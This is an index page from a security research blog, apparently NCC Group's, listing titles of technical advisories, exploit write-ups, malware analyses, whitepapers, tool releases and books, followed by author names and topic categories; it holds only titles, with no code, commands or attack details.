Managing PowerShell in a modern corporate environment
Cisco ASA series part two: Static analysis & datamining of Cisco ASA firmware
Cisco ASA series part one: Intro to the Cisco ASA
EternalGlue part one: Rebuilding NotPetya to assess real-world resilience
Technical Advisory: Authentication rule bypass
Decoder Improved Burp Suite plugin release part one
Technical advisory: Remote shell commands execution in ttyd
Poison Ivy string decryption
Securing the continuous integration process
Signaturing an Authenticode anomaly with Yara
Analysing a recent Poison Ivy sample
Endpoint connectivity
DeLux Edition: Getting root privileges on the eLux Thin Client OS
UK government cyber security guidelines for connected & autonomous vehicles
Smuggling HTA files in Internet Explorer/Edge
Database Security Brief: The Oracle Critical Patch Update for April 2007
Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform
Data-mining with SQL Injection and Inference
The Pharming Guide – Understanding and preventing DNS related attacks by phishers
Weak Randomness Part I – Linear Congruential Random Number Generators
Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges
Blind Exploitation of Stack Overflow Vulnerabilities
Slotting Security into Corporate Development
Creating Arbitrary Shellcode In Unicode Expanded Strings
Violating Database – Enforced Security Mechanisms
Hacking the Extensible Firmware Interface
Advanced Exploitation of Oracle PL/SQL Flaws
Firmware Rootkits: The Threat to the Enterprise
Database Security: A Christmas Carol
Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
Non-flood/non-volumetric Distributed Denial of Service (DDoS)
VoIP Security Methodology and Results
E-mail Spoofing and CDONTS.NEWMAIL
Dangling Cursor Snarfing: A New Class of Attack in Oracle
Database Servers on Windows XP and the unintended consequences of simple file sharing
DNS Pinning and Web Proxies
Technical advisory: CVE-2017-8592 – XMLHttpRequest in IE followed 307 redirections with additional or customised headers
Which database is more secure? Oracle vs. Microsoft
Variations in Exploit methods between Linux and Windows
Using graph databases to assess the security of thingernets based on the thingabilities and thingertivity of things
Live Incident Blog: June Global Ransomware Outbreak
Beyond data loss prevention
How to protect yourself & your organisation from phishing attacks
Rise of the machines: Machine Learning & its cyber security applications
Combating Java Deserialisation Vulnerabilities with Look-Ahead Object Input Streams (LAOIS)
A WarCon 2017 Presentation: Cisco ASA – Exploiting the IKEv1 Heap Overflow – CVE-2016-1287
Latest threats to the connected car & intelligent transport ecosystem
Network Attached Security: Attacking a Synology NAS
Accessing Private Fields Outside of Classes in Java
Understanding the insider threat & how to mitigate it
Matty McMattface: Security implications, mitigations & testing strategies for biometric facial recognition systems
Setting a New Standard for Kubernetes Deployments
Encryption at rest: Not the panacea to data protection
Applying normalised compression distance for architecture classification
Microsoft Zero-Day Vulnerability – OLE2Link – Threat Intelligence and Signatures
D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow
Fix Bounty
Unauthenticated XML eXternal Entity (XXE) vulnerability
General Data Protection Regulation: Knowing your data
Technical Advisory: Shell Injection in MacVim mvim URI Handler
Technical Advisory: Shell Injection in SourceTree
SCOMplicated? – Decrypting SCOM “RunAs” credentials
Technical Advisory: Multiple Vulnerabilities in Accellion File Transfer Appliance
ISM RAT
Mergers & Acquisitions (M&A) cyber security due diligence
Advisory-CraigSBlackie-CVE-2016-9795
Best practices with BYOD
Technical Advisory: Nexpose Hard‐coded Java Key Store Passphrase Allows Decryption of Stored Credentials
Compromising Apache Tomcat via JMX access
Berserko: Kerberos Authentication for Burp Suite
Java RMI Registry.bind() Unvalidated Deserialization
NCC CON Europe 2017
Understanding cyber risk management vs uncertainty with confidence in 2017
iOS MobileSlideShow USB Image Class arbitrary code execution.txt
Denial of Service in Parsing a URL by ierutil.dll
U plug, we play
SSL checklist for pentesters
Dissecting social engineering attacks
External Enumeration and Exploitation of Email and Web Security Solutions
Social Engineering
Phishing Stories
Automating extraction from malware and recent campaign analysis
DDoS Common Approaches and Failings
Absolute Security
How much training should staff have on cyber security?
USB under the bonnet: Implications of USB security vulnerabilities in vehicle systems
Cyber Essentials Scheme
Webinar – PCI Version 3.0: Are you ready?
Webinar: 4 Secrets to a Robust Incident Response Plan
Cloud Security Presentation
Webinar: SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities
Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions
Memory Gap
44Con2013Game
creep-web-app-scanner
ncccodenavi
Pip3line
typofinder
DIBF – Updated
IODIDE
CECSTeR
cisco-SNMP-enumeration
dotnetpaddingoracle
dotnetpefuzzing
easyda
EDIDFuzzer
Fat-Finger
firstexecution
grepify
FrisbeeLite
State-of-the-art email risk
Ransomware: what organisations can do to survive
hostresolver
lapith
metasploitavevasion
Maritime Cyber Security: Threats and Opportunities
IP-reputation-snort-rule-generator
The L4m3ne55 of Passw0rds: Notes from the field
Mature Security Testing Framework
Exporting non-exportable RSA keys
Black Hat USA 2015 presentation: Broadcasting your attack – DAB security
The role of security research in improving cyber security
Self-Driving Cars – The future is now…
They Ought to Know Better: Exploiting Security Gateways via their Web Interfaces
Mobile apps and security by design
The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet
When Security Gets in the Way: PenTesting Mobile Apps That Use Certificate Pinning
USB Undermining Security Barriers: further adventures with USB
Software Security Austerity: Security Debt in Modern Software Development
RSA Conference – Mobile Threat War Room
Finding the weak link in binaries
To dock or not to dock, that is the question: Using laptop docking stations as hardware-based attack platforms
Harnessing GPUs: Building Better Browser Based Botnets
The Browser Hacker’s Handbook
SQL Server Security
The Database Hacker’s Handbook
Social Engineering Penetration Testing
Public Report – Matrix Olm Cryptographic Review
Research Insights Volume 8 – Hardware Design: FPGA Security Risks
Zcash Cryptography and Code Review
Optimum Routers: Researching Managed Routers
Peeling back the layers on defence in depth…knowing your onions
End-of-life pragmatism
iOS Instrumentation Without Jailbreak
The Password is Dead, Long Live the Password!
Microsoft Office Memory Corruption Vulnerability
Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode
Elephant in the Boardroom Survey 2016
A Peek Behind the Great Firewall of Russia
Avoiding Pitfalls Developing with Electron
Flash local-with-filesystem Bypass in navigateToURL
D-Link routers vulnerable to Remote Code Execution (RCE)
iOS Application Security: The Definitive Guide for Hackers and Developers
The Mobile Application Hacker’s Handbook
Research Insights Volume 9 – Modern Security Vulnerability Discovery
Post-quantum cryptography overview
The CIS Security Standard for Docker available now
An adventure in PoEKmon NeutriGo land
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd Edition
How will GDPR impact your communications?
Potential false redirection of web site content in Internet in SAP NetWeaver web applications
Multiple security vulnerabilities in SAP NetWeaver BSP Logon
The Automotive Threat Modeling Template
My name is Matt – My voice is my password
Ransomware: How vulnerable is your system?
NCC Group Whitepaper – Understanding and Hardening Linux Containers – June 29, 2016 – Version 1.1
My Hash is My Passport: Understanding Web and Mobile Authentication
Project Triforce: Run AFL on Everything!
Writing Exploits for Win32 Systems from Scratch
How to Backdoor Diffie-Hellman
Local network compromise despite good patching
Sakula: an adventure in DLL planting
When a Trusted Site in Internet Explorer was Anything But
GSM/GPRS Traffic Interception for Penetration Testing Engagements
An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an Oracle
Creating a Safer OAuth User Experience
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Aurora Response Recommendations
Blind Security Testing – An Evolutionary Approach
Building Security In: Software Penetration Testing
Cleaning Up After Cookies
Command Injection in XML Signatures and Encryption
Common Flaws of Distributed Identity and Authentication Systems
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Developing Secure Mobile Applications for Android
Exposing Vulnerabilities in Media Software
Hunting SQL Injection Bugs
IAX Voice Over-IP Security
ProxMon: Automating Web Application Penetration Testing
iSEC’s Analysis of Microsoft’s SDL and its ROI
Secure Application Development on Facebook
Secure Session Management With Cookies for Web Applications
Security Compliance as an Engineering Discipline
Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
Exploiting Rich Content
HTML5 Security: The Modern Web Browser Perspective
An Introduction to Authenticated Encryption
Attacks on SSL
Content Security Policies Best Practices
Windows Phone 7 Application Security Survey
Browser Extension Password Managers
Introducing idb-Simplified Blackbox iOS App Pentesting
Login Service Security
The factoring dead: Preparing for the cryptopocalypse
Auditing Enterprise Class Applications and Secure Containers on Android
Early CCS Attack Analysis
Analysis of Boomerang Differential Trials via a SAT-Based Constraint Solver URSA
Perfect Forward Security
Internet of Things Security
Secure Messaging for Normal People
Understanding and Hardening Linux Containers
Adventures in Windows Driver Development: Part 1
Private sector cyber resilience and the role of data diodes
From CSV to CMD to qwerty
General Data Protection Regulation – are you ready?
Business Insights: Cyber Security in the Financial Sector
The Importance of a Cryptographic Review
osquery Application Security Assessment Public Report
Sysinternals SDelete: When Secure Delete Fails
Ricochet Security Assessment Public Report
Breaking into Security Research at NCC Group
Building Systems from Commercial Components
Modernizing Legacy Systems: Software Technologies, Engineering Processes, and Business Practices
Secure Coding in C and C++
CERT Oracle Secure Coding Standard for Java
CERT C Secure Coding Standard
Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs
Professional C Programming LiveLessons, (Video Training) Part I: Writing Robust, Secure, Reliable Code
Secure Coding in C and C++, 2nd Edition
The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe, Reliable, and Secure Systems
Secure Coding Rules for Java LiveLessons, Part 1
Hacking Displays Made Interesting
What the HEC? Security implications of HDMI Ethernet Channel and other related protocols
44CON Workshop – How to assess and secure iOS apps
Payment Card Industry Data Security Standard (PCI DSS): A Navigation and Explanation of Changes from v2.0 to v3.0
Mobile World Congress – Mobile Internet of Things
Practical SME security on a shoestring
BlackHat Asia USB Physical Access
How we breach network infrastructures and protect them
Hacking a web application
Batten down the hatches: Cyber threats facing DP operations
Threats and vulnerabilities within the Maritime and shipping sectors
Distributed Ledger (Blockchain) Security and Quantum Computing Implications
Abusing Privileged and Unprivileged Linux Containers
A few notes on usefully exploiting libstagefright on Android 5.x
NCC Con Europe 2016
Remote Exploitation of Microsoft Office DLL Hijacking (MS15-132) via Browsers
Phishing Mitigations: Configuring Microsoft Exchange to Clearly Identify External Emails
Car Parking Apps Vulnerable To Hacks
eBook – Do you know how your organisation would react in a real-world attack scenario?
Erlang Security 101
SysAid Helpdesk blind SQL injection
SysAid Helpdesk stored XSS
Virtual Access Monitor Multiple SQL Injection Vulnerabilities
Whatsupgold Premium Directory traversal
Windows remote desktop memory corruption leading to RCE on XPSP3
Windows USB RNDIS driver kernel pool overflow
Drones: Detect, Identify, Intercept, and Hijack
Introducing Chuckle and the Importance of SMB Signing
Threat Intelligence: Benefits for the Enterprise
Best Practices for the use of Static Code Analysis within a Real-World Secure Development Lifecycle
Secure Device Manufacturing: Supply Chain Security Resilience
eBook – Planning a robust incident response process
HDMI Ethernet Channel
Advanced SQL Injection in SQL Server Applications
USB keyboards by post – use of embedded keystroke injectors to bypass autorun restrictions on modern desktop operating systems
ASP.NET Security and the Importance of KB2698981 in Cloud Environments
Xen HYPERVISOR_xen_version stack memory revelation
Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3
SysAid Helpdesk Pro – Blind SQL Injection
Symantec Messaging Gateway SSH with backdoor user account + privilege escalation to root due to very old Kernel
Symantec Messaging Gateway Out of band stored XSS delivered by email
Symantec Messaging Gateway Easy CSRF to add a backdoor-administrator (for example)
Symantec Messaging Gateway Arbitrary file download is possible with a crafted URL (authenticated)
Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom Reports
Symantec Backup Exec 2012 – OS version and service pack information leak
Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs
Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding Groups, Servers and Computers
Squiz CMS File Path Traversal
Solaris 11 USB Hub Class descriptor kernel stack overflow
SmarterMail – Stored XSS in emails
Remote code execution in ImpressPages CMS
OS X 10.6.6 Camera Raw Library Memory Corruption
Oracle Java Installer Adds a System Path Which is Writable by All
Oracle Hyperion 11 Directory Traversal
Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges
Nessus Authenticated Scan – Local Privilege Escalation
NCC Group Malware Technical Note
Nagios XI Network Monitor – Stored and Reflective XSS
Multiple Vulnerabilities in MailEnable
Microsoft Internet Explorer CMarkup Use-After-Free
McAfee Email and Web Security Appliance v5.6 – Session hijacking (and bypassing client-side session timeouts)
McAfee Email and Web Security Appliance v5.6 – Password hashes can be recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass controls to reset passwords of other administrators
McAfee Email and Web Security Appliance v5.6 – Active session tokens of other users are disclosed within the UI
iOS 7 arbitrary code execution in kernel mode
Understanding Microsoft Word OLE Exploit Primitives
Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 Microsoft Office CTaskSymbol Use-After-Free Vulnerability
Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using the TD-8817
Vehicle Emissions and Cyber Security
Research Insights Volume 6: Common Issues with Environment Breakouts
Does TypeScript Offer Security Improvements Over JavaScript?
Common Security Issues in Financially-Oriented Web Applications
Research Insights Volume 3 – How are we breaking in: Mobile Security
Build Your Own Wi-Fi Mapping Drone Capability
Exploiting CVE-2015-2426, and How I Ported it to a Recent Windows 8.1 64-bit
Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
Password and brute-force mitigation policies
Understanding Ransomware: Impact, Evolution and Defensive Strategies
libtalloc: A GDB plugin for analysing the talloc heap
Lumension Device Control (formerly Sanctuary) remote memory corruption
LibAVCodec AMV Out of Array Write
Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass
Flash security restrictions bypass: File upload by URLRequest
Immunity Debugger Buffer Overflow
DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Cups-filters remote code execution
Critical Risk Vulnerability in SAP Message Server (Heap Overflow)
Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)
Critical Risk Vulnerability in Ingres (Pointer Overwrite 2)
Critical Risk Vulnerability in Ingres (Pointer Overwrite 1)
Cisco VPN Client Privilege Escalation
Cisco IPSec VPN Implementation Group Name Enumeration
Blue Coat BCAAA Remote Code Execution Vulnerability
BlackBerry Link WebDav Server Bound to the BlackBerry VPN Adapter
Bit51 Better Security WP Security Plugin – Unauthenticated Stored XSS to RCE
Back Office Web Administration Authentication Bypass
AtHoc Toolbar
ASE 12.5.1 datatype overflow
Archived Technical Advisories
Apple QuickTime Player m4a Processing Buffer Overflow
Apple OSX/iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow
Apple Mac OS X ImageIO TIFF Integer Overflow
Apple CoreAnimation Heap Overflow
Writing Small Shellcode
Writing Secure ASP Scripts
Windows 2000 Format String Vulnerabilities
The Pentesters Guide to Akamai
Adobe flash sandbox bypass to navigate to local drives
Adobe Flash Player Cross Domain Policy Bypass
Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
Tool Release: Introducing opinel: Scout2’s favorite tool
Broadcasting your attack – DAB security
Modelling Threat Actor Phishing Behaviour
Research Insights Volume 7: Exploitation Advancements
Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug on both 32-bit and 64-bit
The Demise of Signature Based Antivirus
Stopping Automated Attack Tools
Security of Things: An Implementers’ Guide to Cyber-Security for Internet of Things Devices and Beyond
Security Best Practice: Host Naming & URL Conventions
Securing PL/SQL Applications with DBMS_ASSERT
Second-Order Code Injection Attacks
Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions 2013
Research Insights Volume 4 – Sector Focus: Maritime Sector
Research Insights Volume 2 – Defensive Trends
Research Insights Volume 1 – Sector Focus: Financial Services
Quantum Cryptography – A Study Into Present Technologies and Future Applications
Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
Preparing for Cyber Battleships – Electronic Chart Display and Information System Security
Passive Information Gathering – The Analysis of Leaked Network Security Information
Oracle Passwords and OraBrute
Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic Investigations
Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin
Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing
Oracle Forensics Part 4: Live Response
Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism
Oracle Forensics Part 2: Locating Dropped Objects
Oracle Forensics Part 1: Dissecting the Redo Logs
Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT 2000 XP
New Attack Vectors and a Vulnerability Dissection of MS03-007
More Advanced SQL Injection
Microsoft’s SQL Server vs. Oracle’s RDBMS
Microsoft SQL Server Passwords
Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
Lessons learned from 50 bugs: Common USB driver vulnerabilities
Inter-Protocol Exploitation
Inter-Protocol Communication
Improving your Network and Application Assurance Strategy in an environment of increasing 0day vulnerabilities
Implementing and Detecting a PCI Rootkit
How organisations can properly configure SSL services to ensure the integrity and confidentiality of data in transit
Hackproofing Oracle Application Server
Hackproofing MySQL
Hackproofing Lotus Domino Web Server
Hacking Appliances: Ironic exploits in security products
Fuzzing USB devices using Frisbee Lite
HDMI – Hacking Displays Made Interesting
Exploiting Security Gateways Via Web Interfaces
Research Insights Volume 5 – Sector Focus: Automotive
The why behind web application penetration test prerequisites
Blackbox iOS App Assessments Using idb
Cyber red-teaming business-critical systems while managing operational risk
Blind Return Oriented Programming
Username enumeration techniques and their value
IAM user management strategy (part 2)
Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
Some Notes About the Xen XSA-122 Bug
USB attacks need physical access right? Not any more…
Image IO Memory Corruption
Threat Profiling Microsoft SQL Server
Thin Clients: Slim Security
Impress Pages CMS Remote Code Execution
The Phishing Guide: Understanding & Preventing Phishing Attacks
Lumension Device Control Remote Memory Corruption
McAfee Email and Web Security Appliance Active session tokens of other users are disclosed within the UI
McAfee Email and Web Security Appliance Any logged-in user can bypass controls to reset passwords of other administrators
Bypassing Oracle DBMS_ASSERT (in certain situations)
McAfee Email and Web Security Appliance Arbitrary file download is possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance Password hashes can be recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance Reflective XSS allowing an attacker to gain session tokens
McAfee Email and Web Security Appliance Session hijacking and bypassing client-side session timeouts
Medium Risk Vulnerability in Symantec Enterprise Security Management
Medium Risk Vulnerability in Symantec Network Access Control
Nagios XI Network Monitor Stored and Reflected XSS
NX Server for Linux Arbitrary Files can be read with root privileges
Oracle 11g TNS listener remote Invalid Pointer Read
Oracle 11g TNS listener remote Null Pointer Dereference
Oracle Retail Integration Bus Manager Directory Traversal
Oracle Retail Invoice Manager SQL Injection
OS X Lion USB Hub Class Descriptor Arbitrary Code Execution
PRTG Network Monitor Command injection
Samba Andx Request Remote Code Execution
Samba on the BlackBerry PlayBook
Solaris 11 USB hubclass
Symantec Message Filter Session Hijacking via session
Symantec Message Filter Unauthenticated verbose software version information disclosure
Symantec Messaging Gateway – Addition of a backdoor administrator via CSRF
Symantec Messaging Gateway – Authenticated arbitrary file download
Symantec Messaging Gateway – Out of band stored XSS via email
Symantec Messaging Gateway – Unauthenticated detailed version disclosure
Symantec Messaging Gateway – Unauthorised SSH access
Symantec PC Anywhere Remote Code Execution
Adam Roberts
Anthony Ferrillo
Aaron Greetham
Aaron Haymore
Aleksandar Kircanski
Alessandro Fanio Gonzalez
Alessandro Fanio González
Alex Plaskett
Alvaro Martin Fraguas
Álvaro Martín Fraguas
Andrea Shirley-Bellande
Drew Wade
Andy Davis
Andy Grant
Antonis Terefos
anvesh3752
Alexander Smye
aschmitz
Author Test
Ava Howell
Andrew Whistlecroft
balazs.bucsay
Nicolas Bidron
NCC Group Physical Breach Team
Rich Warren
Caleb Watt
Clinton Carpene
Cedric Halbronn
chrisanley
Christo Butcher
Clayton Lowell
Clint Gibler
Contributor Test
corancc
Corey Arthur
Christian Powills
Craig Blackie
Catalin Visinescu
Ken Wolstencroft
Dale Pavey
Damon Small
Dan Hastings
Dave G.
David Tulis
David Cash
Daniele Costa
destoken
Diana Dragusin
Diego Gomez Maranon
Diego Gómez Marañon
Domen Puncer Kugler
Daniel Romero
David Young
Edward Torkington
Exploit Development Group
elenabakoslang
Eli Sohl
epliuncc
Erik Schamper
Erik Steringer
Eric Schorn
fernandogallegopinero
Aaron Adams
Gavin Cotter (Temp)
Gerald Doussot
Gérald Doussot
Giacomo Pope
Global Threat Intelligence
Guy Morley
William Handy
Liew hock lai
Hollie Mowatt
Heather Overcash
Rob Wood
Iain Smart
Izzy Whistlecroft
Jacob Heath
Jameson Hyde
Phillip Langlois and Edward Torkington
Jashan Benawra
Jason Kielpinski
Javed Samuel
James Chambers
Jelle Vergeer
Jennifer Reed
Jeremy Boone
Jerome Smith
Jesus Calderon Marin
Jesús Calderón Marín
Jack Leadford
Joshua Makinen
John Redford
Joost Jansen
Joshua Dow
Jose Selvi
Kenneth Yu
Kat Sommer
Katarina Dabler
Ben Lister
Krijn de Mik
Lars Behrens
Lawrence Munro
Liam Glanfield
Liam Stevenson
Liyun Li
Lucas Rosevear
Luke Paris
Matt Lewis
Manuel Gines
Margit Hazenbroek
Marie-Sarah Lacharite
Mario Rivas
NCC Group & Fox-IT Data Science Team
Max Groot
McCaulay Hudson
Michael Gough
Mostafa Hassan
Matthew Pettitt
Frank Gifford
Michelle Simpson
Neil Bergman
NCC Group
NCC Group Publication Archive
Bill Marquette
Daniel Lopezjimenez
nccdavid
Dan Helton
RIFT: Research and Intelligence Fusion Team
nccgresearchrr
NCC Group Red Team
Ilya Zhuravlev
Jennifer Fernick
ncckai
Lewis Lockwood
Jon Szymaniak
Mark Manning
nccmarktedman
Michael Sandee
Simon Palmer
nccricardomr
Stefano Antenucci
Simone Salucci and Daniel Lopez Jimenez
Samuel Siu
Tanner Prynn
Yun Zheng Hu
Stephen Tomkinson
Nicolas Guigo
Nick Galloway
Nick Muir
Nick Dunn
Nick Sirris
Nikolaos Pantazopoulos
Oliver Brooks
Ollie Whitehouse
Ollie Wen
Parnian Alimi
Paul Bottinelli
Peter Scopes
Peter Hannay
philipmarsdennccgroupcom
Pixel Kicks
pixelkicks-fiona
pixelkicks-fred
pixelkicks-matt.hamer
pixelkicks-turhan
pixelkicks-will
pqueenncc
Philipp Schaefer
qkchambers
Rory McCune
Rami McCarthy
Ray Lai
Robert C. Seacord
Rennie deGraaf
Chris Nevin
Richard Appleby
Rick Veldhoven
Fumik0_
Rindert Kramer
Rob Ince
robertgrimes123
Robert Wessen
Robert Schwass
sampeate
Roger Meyer
schlopeckincc
Siddarth Adukia
Sam Leonard (they/them)
Spencer Michaels
Sander de Jong
Stuart Kurutac
Subscriber Test
Sultan Khan
Swathi Nagarajan
Simon Watson
Jeff Dileo
Thomas Marshall
Ivan Reedman
Thomas Pornin
Jeremy Boone
Viktor Gazdag
Vishtasp Jokhi
Wouter Jansen
William Groesbeck
whoughtonncc
Wordpress SSO Test
Xavier Garceau-Aranda
Ken Gannon
Kevin Henry
5G Security & Smart Environments
Academic Partnership
Annual Research Report
Asia Pacific Research
Awards & Recognition
Books
Business Insights
Cloud & Containerization
Cloud Security
Conferences
Corporate
Cryptography
CTFs/Microcorruption
Current events
Cyber as a Science
Cyber Security
Detection and Threat Hunting
Disclosure Policy
Emerging Technologies
Engineering
Fox-IT
Fox-IT and European Research
Gaming & Media
Hardware & Embedded Systems
Intern Projects
iSec Partners
Machine Learning
Managed Detection & Response
Misinformation, Deepfakes, & Synthetic Media
North American Research
Offensive Security & Artificial Intelligence
Patch notifications
Presentations
protocol_name
Public interest technology
Public Report
Public tools
Reducing Vulnerabilities at Scale
Research
Research Paper
Reverse Engineering
Risk Management & Governance
Standards
Technical advisories
Technology Policy
Threat briefs
Threat Intelligence
Tool Release
Transport
Tutorial/Study Guide
UK Research
Uncategorized
Virtualization, Emulation, & Containerization
Vulnerability
Whitepapers
Public Report – IOV Labs powHSM Security Assessment
Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices
A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion
Detecting Mimikatz with Busylight
Whitepaper – Project Triforce: Run AFL On Everything (2017)
Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router (CVE-2022-37413, CVE-2022-37414)
A Guide to Improving Security Through Infrastructure-as-Code
Tool Release – ScoutSuite 5.12.0
Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter Selection Review
Tool Release – Monkey365
Sharkbot is back in Google Play
Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
Conference Talks – September/October 2022
SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
Writing FreeBSD Kernel Modules in Rust
NCC Con Europe 2022 – Pwn2Own Austin Presentations
Tool Release – JWT-Reauth
Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
Top of the Pops: Three common ransomware entry techniques
NCC Group Research at Black Hat USA 2022 and DEF CON 30
Tool Release – insject: A Linux Namespace Injector
Technical Advisory – Multiple vulnerabilities in Nuki smart locks (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507, CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508, CVE-2022-32505)
NIST Selects Post-Quantum Algorithms for Standardization
Climbing Mount Everest: Black-Byte Bytes Back?
Five Essential Machine Learning Security Papers
Whitepaper – Practical Attacks on Machine Learning Systems
Flubot: the evolution of a notorious Android Banking Malware
A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control link
Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
Understanding the Impact of Ransomware on Patient Outcomes – Do We Know Enough?
Public Report – Threshold ECDSA Cryptography Review
Exception Handling and Data Integrity in Salesforce
Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)
Shining the Light on Black Basta
Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible Reports through the Intel Circuit Breaker program
Conference Talks – June 2022
Hardware Security By Design: ESP32 Guidance
Public Report – Lantern and Replica Security Assessment
NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher Leaderboard
Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection (CVE-2022-31794 and CVE-2022-31795)
Public Report – go-cose Security Assessment
Technical Advisory – SerComm h500s – Authenticated Remote Command Execution (CVE-2021-44080)
Metastealer – filling the Raccoon void
earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts
Tool Release – Ghostrings
Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks
Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks
Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)
North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
Adventures in the land of BumbleBee – a new malicious loader
LAPSUS$: Recent techniques, tactics and procedures
Real World Cryptography Conference 2022
Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark
A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
Public Report – Google Enterprise API Security Assessment
Conti-nuation: methods and techniques observed in operations post the leaks
Whitepaper – Double Fetch Vulnerabilities in C and C++
Mining data from Cobalt Strike beacons
Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
Tool Release – ScoutSuite 5.11.0
Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
Microsoft announces the WMIC command is being retired, Long Live PowerShell
SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
Estimating the Bit Security of Pairing-Friendly Curves
Detecting anomalous Vectored Exception Handlers on Windows
BrokenPrint: A Netgear stack overflow
Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review
Testing Infrastructure-as-Code Using Dynamic Tooling
10 real-world stories of how we’ve compromised CI/CD pipelines
NCC Group’s 2021 Annual Research Report
On the malicious use of large language models like GPT-3
Technical Advisory – Lenovo ImController Local Privilege Escalation (CVE-2021-3922, CVE-2021-3969)
Choosing the Right MCU for Your Embedded Device — Desired Security Features of Microcontrollers
FPGAs: Security Through Obscurity?
Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
Log4Shell: Reconnaissance and post exploitation network detection
Announcing NCC Group’s Cryptopals Guided Tour!
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary File Deletion
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote Command Execution (CVE-2021-20044)
Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow (CVE-2021-20043)
